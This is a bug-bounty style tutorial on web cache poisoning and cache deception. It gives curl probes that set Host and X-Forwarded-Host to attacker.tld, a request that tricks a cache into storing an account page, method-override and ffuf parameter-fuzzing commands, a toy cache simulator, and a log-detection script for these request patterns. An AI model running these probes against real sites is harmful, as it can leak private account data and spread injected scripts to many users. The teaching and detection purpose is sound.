Caching bugs are silent assassins. You won’t see them in OSCP, but on bug bounty targets they can be the key to cross-tenant leaks, session hijacking, or straight account takeover. In this guide, we’ll weaponize simple requests — Host headers, extra parameters, caching directives — to turn the server’s own speed tricks against it.
Understanding Web Caching
Most modern stacks sit behind caching layers:
CDNs (Cloudflare, Akamai, Fastly)
Reverse proxies (Varnish, Squid, nginx with proxy_cache)
Load balancers with cache modules
Caching is meant to save resources by storing copies of responses and serving them to later requests that produce the same cache key. The danger: if a cache can be poisoned or tricked, every subsequent user who hits that key sees your payload.
Cache Poisoning Attacks
Cache poisoning = getting malicious input stored in a cached response, so the cache then serves it to everyone who requests the same cache key.
Classic example: Host header abuse, where the app reflects the Host header into the response (e.g. in absolute URLs it builds).
# Poison host header
curl -H "Host: attacker.tld" https://victim.com/ -v
If the cache stores this and serves it to others, you’ve poisoned the page.
With Burp’s Param Miner extension, you can hunt for headers or params that change the response but are not part of the cache key (unkeyed inputs the app doesn’t sanitize). Examples: X-Forwarded-Host, X-Forwarded-Scheme, X-Original-URL.
Cache Deception Attacks
Cache deception = tricking the cache into storing a private, authenticated response by making its URL look like a static file, e.g. by appending a file extension.
# Force cache to store authenticated page
curl https://target.com/account.php/style.css -b session=VALID
The app still serves account data, but the cache thinks it’s a static file. Now /account.php/style.css is public for anyone.
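To make both mechanisms above (header-based poisoning and extension-based deception) concrete, here is an added toy model of a caching proxy in front of an origin, run once with a naive cache policy and once with a hardened one. This is example code written for this page, not code from the original post or from any cache product; the origin routes, the host names victim.example and attacker.example, the session cookie value and the two cache policies are all constructed for the illustration.

```python
"""Toy caching proxy + origin.  Added example: the routes, host names and cache
policies are constructed for illustration and do not model any specific product."""
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

Headers = Dict[str, str]
STATIC_EXT = (".css", ".js", ".png")


@dataclass
class Response:
    status: int
    headers: Headers
    body: str


def origin(path: str, headers: Headers) -> Response:
    """Constructed origin app with the two weaknesses the post describes: it builds
    an absolute URL from X-Forwarded-Host, and /account.php also answers for any
    sub-path such as /account.php/style.css (PHP-style path info)."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host", "victim.example")
    if path.startswith("/account.php"):
        if headers.get("Cookie") != "session=VALID":
            return Response(401, {"Content-Type": "text/html",
                                  "Cache-Control": "no-store"}, "login required")
        return Response(200, {"Content-Type": "text/html", "Cache-Control": "private"},
                        "<h1>Account</h1>email=victim@example.org")
    return Response(200, {"Content-Type": "text/html",
                          "Cache-Control": "public, max-age=60"},
                    f'<script src="https://{host}/app.js"></script>')


@dataclass
class Cache:
    hardened: bool
    store: Dict[Tuple[Optional[str], ...], Response] = field(default_factory=dict)

    def key(self, path: str, headers: Headers) -> Tuple[Optional[str], ...]:
        if self.hardened:
            # Every input the origin lets influence the body must be part of the key
            return (headers.get("Host"), headers.get("X-Forwarded-Host"), path)
        return (path,)                     # naive: path only, the header is unkeyed

    def cacheable(self, path: str, resp: Response) -> bool:
        cc = resp.headers.get("Cache-Control", "")
        if self.hardened:
            # Only store what the origin explicitly marks shareable
            return resp.status == 200 and "public" in cc
        # Naive: an extension rule overrides the origin's own directives
        return resp.status == 200 and ("public" in cc or path.endswith(STATIC_EXT))

    def fetch(self, path: str, headers: Headers) -> Tuple[str, Response]:
        k = self.key(path, headers)
        if k in self.store:
            return "HIT", self.store[k]
        resp = origin(path, headers)
        if self.cacheable(path, resp):
            self.store[k] = resp
        return "MISS", resp


def poisoning_scenario(hardened: bool) -> str:
    """One request carrying X-Forwarded-Host, then a plain visitor to the same
    path; returns the body the plain visitor receives."""
    cache = Cache(hardened)
    cache.fetch("/", {"Host": "victim.example", "X-Forwarded-Host": "attacker.example"})
    _, visitor = cache.fetch("/", {"Host": "victim.example"})
    return visitor.body


def deception_scenario(hardened: bool) -> Tuple[str, int, str]:
    """A logged-in user loads /account.php/style.css, then an unauthenticated
    request asks for the same URL; returns (cache state, status, body) for it."""
    cache = Cache(hardened)
    cache.fetch("/account.php/style.css",
                {"Host": "victim.example", "Cookie": "session=VALID"})
    state, anon = cache.fetch("/account.php/style.css", {"Host": "victim.example"})
    return state, anon.status, anon.body


if __name__ == "__main__":
    for hardened in (False, True):
        label = "hardened" if hardened else "naive   "
        print(label, "poisoning:", poisoning_scenario(hardened))
        print(label, "deception:", deception_scenario(hardened))
```

Under the naive policy the plain visitor gets the attacker-controlled script URL and the anonymous request gets the cached account page, purely because of the `.css` suffix. The hardened policy fixes poisoning by keying on the forwarded header (stripping it at the edge is the stronger deployment choice) and fixes deception by trusting the origin's Cache-Control over the URL shape.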
Practical Examples
Cache Key Confusion
Two URLs resolve the same content, but only one respects authentication. Cache one, serve both.
# Normal request (auth required)
curl -b auth=valid https://victim.com/profile
# Poison with extra param
curl -b auth=valid https://victim.com/profile?x=1
Header-based Poisoning
curl -H "X-Forwarded-Host: attacker.tld" https://victim.com/ -v
Watch if it gets cached and replayed to other visitors.
Method Override Poisoning
curl -X POST -H "X-HTTP-Method-Override: GET" https://victim.com/
If the cache sees GET but the app processes POST, you’ve split reality.
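From the operator's side, the three probe shapes above (forwarded-host headers, cache hits on authenticated routes with extra parameters, and method override) all leave traces in proxy access logs. The following is an added detection example, not code from the original post: it parses a handful of constructed log lines in an assumed custom nginx log_format built from $upstream_cache_status and the $http_* request-header variables, and flags each pattern. The PRIVATE_PREFIXES list is site-specific and assumed.

```python
"""Detection pass over proxy access logs for the request patterns discussed above.
Added example: the log lines are constructed, the log_format is assumed to be a
custom nginx format built from $upstream_cache_status and $http_* variables, and
PRIVATE_PREFIXES is a site-specific list you would fill in yourself."""
import re
from typing import Dict, List, Optional

# Assumed nginx log_format (nginx writes "-" for an empty variable):
#   '$remote_addr "$request" $status $upstream_cache_status '
#   'xfh="$http_x_forwarded_host" xou="$http_x_original_url" xmo="$http_x_http_method_override"'
LINE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
    r'(?P<cache>\S+) xfh="(?P<xfh>[^"]*)" xou="(?P<xou>[^"]*)" xmo="(?P<xmo>[^"]*)"$'
)
OVERRIDE_HEADERS = (("X-Forwarded-Host", "xfh"), ("X-Original-URL", "xou"),
                    ("X-HTTP-Method-Override", "xmo"))
PRIVATE_PREFIXES = ("/account", "/profile")        # assumed: routes that need a session
STATIC_EXT = re.compile(r"\.(css|js|png|jpg|ico)$", re.I)
DYNAMIC_SEGMENT = re.compile(r"\.(php|aspx?|jsp)/|/(account|profile)/", re.I)

# Constructed sample log (RFC 5737 addresses); not taken from any real server
SAMPLE_LOG = [
    '203.0.113.5 "GET / HTTP/1.1" 200 MISS xfh="attacker.example" xou="-" xmo="-"',
    '198.51.100.7 "GET / HTTP/1.1" 200 HIT xfh="-" xou="-" xmo="-"',
    '198.51.100.9 "GET /account.php/style.css HTTP/1.1" 200 MISS xfh="-" xou="-" xmo="-"',
    '203.0.113.5 "GET /account.php/style.css HTTP/1.1" 200 HIT xfh="-" xou="-" xmo="-"',
    '203.0.113.5 "POST / HTTP/1.1" 200 MISS xfh="-" xou="-" xmo="GET"',
    '198.51.100.7 "GET /static/app.css HTTP/1.1" 200 HIT xfh="-" xou="-" xmo="-"',
    '203.0.113.5 "GET /profile?x=1 HTTP/1.1" 200 HIT xfh="-" xou="-" xmo="-"',
    'this line does not match the format and is skipped',
]


def parse(line: str) -> Optional[Dict[str, str]]:
    m = LINE.match(line)
    return m.groupdict() if m else None


def analyze(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per (line, rule) match; malformed lines are skipped."""
    findings: List[Dict[str, str]] = []

    def flag(rec: Dict[str, str], rule: str, detail: str) -> None:
        findings.append({"ip": rec["ip"], "path": rec["path"],
                         "rule": rule, "detail": detail})

    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]        # prefix match ignores the query
        # 1. Override headers are assumed to be stripped at this edge, so any
        #    value that reaches the log is a probe or a misconfiguration
        for name, key in OVERRIDE_HEADERS:
            if rec[key] not in ("", "-"):
                flag(rec, "override-header", f"{name}={rec[key]}")
        # 2. A cache HIT on a per-session route means private data was shared
        if rec["cache"] == "HIT" and path.startswith(PRIVATE_PREFIXES):
            flag(rec, "private-route-hit", f"status={rec['status']}")
        # 3. Static-looking suffix on a dynamic route: the deception shape
        if STATIC_EXT.search(path) and DYNAMIC_SEGMENT.search(path):
            flag(rec, "static-suffix-on-dynamic-path", path)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['rule']:32} {f['ip']:14} {f['path']} ({f['detail']})")
```

Rule 2 is the one worth wiring to an alert: a HIT on a route that should only ever be served per session is a leak in progress, whatever caused it. Rules 1 and 3 are noisier and better suited to a daily review or a dashboard.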
Tools in Play
Burp Suite + Param Miner: brute force for unkeyed headers/params.
ffuf: param discovery.
ffuf -w /usr/share/seclists/Discovery/Web-Parameter/test-params.txt:FUZZ \
-u https://target.tld/page?FUZZ=1 -fc 404
curl: raw probes for headers and edge cases.
Real Bug Bounty Context
Caching bugs scale: you poison once, thousands of users get hit. High impact = high payout.
Cache poisoning → XSS payload spreads like a worm.
Cache deception → sensitive data leak without auth.
Cache key confusion → cross-tenant data access.
Command Recap
# Host header injection
curl -H "Host: attacker.tld" https://victim.com/
# Cache deception trick
curl https://victim.com/account.php/style.css -b session=VALID
# Param miner / fuzzing
ffuf -w test-params.txt:FUZZ -u https://target.tld/page?FUZZ=1 -fc 404
Final Thoughts
Web caches are supposed to protect servers, not attackers. But when they trust headers or file extensions blindly, you can rewrite reality for every user downstream. One poisoned request can become a global exploit.